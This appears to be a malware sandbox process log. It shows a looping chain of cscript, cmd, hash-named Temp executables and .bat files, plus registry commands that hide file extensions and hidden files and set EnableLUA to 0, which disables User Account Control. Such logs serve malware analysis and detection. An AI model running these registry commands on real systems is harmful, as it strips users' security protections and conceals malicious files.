cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HAQYEgUk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PiUoIcIg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nYIUcYwE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\osAEckUk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OGYMscgU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CkwwUMYs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AYossIMA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PCkMYAoY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rioYUMgU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HiAIEoEA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HqcIswYo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\meIcIkQM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aCwIUsAQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wEAAQkoc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RqYwAUcM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dMYEcoUw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\feMIAgYE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RmIAYYcY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SagwYgIs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YIoUkQcA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\suUscEoI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nWUIQEcI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
